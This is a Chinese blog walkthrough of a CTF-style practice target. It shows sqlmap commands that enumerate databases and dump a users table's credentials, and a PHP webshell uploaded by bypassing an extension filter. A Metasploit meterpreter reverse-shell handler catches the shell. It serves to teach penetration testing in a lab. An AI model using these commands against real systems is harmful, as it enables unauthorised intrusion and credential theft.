web靶机系列-GET参数注入

最新推荐文章于 2024-05-14 16:37:00 发布
最新推荐文章于 2024-05-14 16:37:00 发布
阅读量463 收藏 2
点赞数
文章标签: xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/106398700
版权

主机:192.168.136.133
靶机:192.168.136.143
用nmap、dirb扫描靶机
在这里插入图片描述
在这里插入图片描述
发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面
在这里插入图片描述
试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵
用owasp-zap扫描
在这里插入图片描述
发现有sql注入
利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs
在这里插入图片描述
有两个数据库
再用sqlmap -u http://192.168.136.143/cat.php?id=3 -D information_schema –tables查看一下information_schema,表太多,直接看下一个有什么。
在这里插入图片描述
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog –tables
在这里插入图片描述
看到有users的表,可能存在登陆账户和密码
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users –columns
在这里插入图片描述
查看login和password
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users -C “login,password” –dump
在这里插入图片描述
看到了登陆账号和密码,返回登陆页面。登陆进去,在new picture选项发现有可上传选项
在这里插入图片描述
在这里插入图片描述
接下来构造shell并写一个php文本上传
在这里插入图片描述
在这里插入图片描述
用msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.136.133
开始run监听
在这里插入图片描述
上传发现出现这个页面
在这里插入图片描述
可能被防火墙过滤,改.PHP
在这里插入图片描述
反弹shell成功
在这里插入图片描述

0x 0101
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 4051
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 881
SQL注入getshell靶机实战
SQL注入GET参数
FXHQAQ的博客
12-20 980
1、SQL注入漏洞介绍 sql注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 SQL注入的产生原因通常表现在以下几个方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处...
sql注入get参数
Vinson的博客
09-27 1290
攻击机192.168.43.61 靶机192.168.43.65 admin弱命令 web漏洞扫描器owasp-zap cross site scripting 高危漏洞 sql注入漏洞,可直接获取服务器权限 使用sqlmap利用sql 注入漏洞 sqlmap -u url --dbs information_schema自带数据库,不用管 sqlma...
SQL注入--get注入
weixin_52151447的博客
11-11 2435
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
CTF实验SQL注入GET参数
floyd_art的博客
03-30 719
SQL注入漏洞介绍 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交...
web渗透测试靶机(新手)
05-07
这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用这些漏洞来提升自己的技能。 渗透测试,又称黑客道德测试,是对网络系统进行安全评估的一种方法,目的是发现并修复潜在的安全风险。在这...
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2527
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
vulnhub靶机DC-8渗透笔记
liver100day的博客
07-27 309
文章目录环境准备1.信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 使用sqlmap爆破数据1.判断注入类型,构造语句2.判断列数,构建语句3.爆破数据库名,构建语句4.爆破d7db数据库中的所有表名,构建语句5.爆破users数据表中的所有字段名6.爆破name,pass字段中的所有数据2.2 使用john破解密码2.3 爆破目录2.4 写入一句话木马,反弹shell3.提权4.总计 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.
CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)
qq_43355651的博客
10-20 1358
靶机地址: 链接:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg 提取码:8520 准备环境: vm下kali系统和靶机 kali:192.168.111.128 靶机:192.168.111.130 首先进行信息收集这里我们用到端口扫描之王-nmap namp -sV 192.168.111.130 探测端口服务版本 由此我们得到开放了22和80端口 对应的服务分别是ssh和apache 然后我们再进一步探测 使用Nikto -hos.
CTF训练笔记(六)- HTTP服务(SQL注入→GET参数注入)(待续)
morrino的博客
04-27 1421
本文介绍了SQL注入中get参数注入部分,也介绍了一些渗透测试常用工具及具体使用实例
数字型GET注入
supermeatboy223的博客
02-16 1153
1.访问sqli-labs 选择关卡2 登录后根据页面提示 先给定一个GET参数。 在url后加上 ?id=1 此时页面显示 id=1 的用户名 Dump 密码 Dump 2.寻找注入点 分别使用一下三条payload http://192.168.5.152/sql/Less-2/?id=1' http://192.168.5.152/sql/Less-2/?id=1 and 1=1 http://192.168.5.152/sql/Less-2/?id=1 and 1=2 分别
WEB】命令注入(基础知识讲解及绕过姿势)(更新中)
weixin_45844670的博客
08-24 1401
通过web程序,在服务器上拼接系统命令。基础知识命令注入的条件:PHP执行系统命令的函数:&,&&,|,|| 的区别:漏洞利用服务器进行参数过滤空格代替截断符号利用base编码绕过过滤了敏感命令对比和文件上传漏洞对比和远程代码执行对比工具的使用防护白名单保护黑名单保护 基础知识 正常情况下,是ping一个IP地址。确定调用系统命令 确定可控字段 确定命令语句,&&可以连接两条Windows命令 命令注入的条件: web应用程序调用可执行系统命令的函数 执行系统命令的
渗透靶机进行提权
weixin_48876267的博客
10-21 468
渗透靶机进行提权 1 获取靶机相关信息 nmap -sV 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT Nmap scan report for localhost (192.168.222.131) Host is up (0.000067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3617
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
网络安全-靶机pikachu之xss注入与代码分析(XSStrike实战)_反序列入漏洞工具+pikachu+xss(2)
最新发布
2401_84544914的博客
05-14 417
本文使用靶机pikachu,来练习一下工具XSStrike常用命令。
利用XSS漏洞对靶机进行控制
asways' bolg
12-31 515
利用XSS漏洞对靶机进行控制管理 一、使用工具: Kali Linux 虚拟机(攻击机) Windows 7 虚拟机(靶机) DVWA(需要安装在攻击机中) BeEF (需要安装在攻击机中,一般Kali Linux有自带) 二、具体步骤: 在Kali Linux中输入以下代码,打开MySQL和Apache2服务 service mysql start #开启mysql服务 service apache2 start #开启Apache2服务 在Ka
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 917
owasp十大漏洞中第一的sql注入
实验:学习GET注入
茶花语的博客
02-25 5185
使用sqlmap工具,基于GET请求的SQL注入实验
vulnhub靶机系列
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值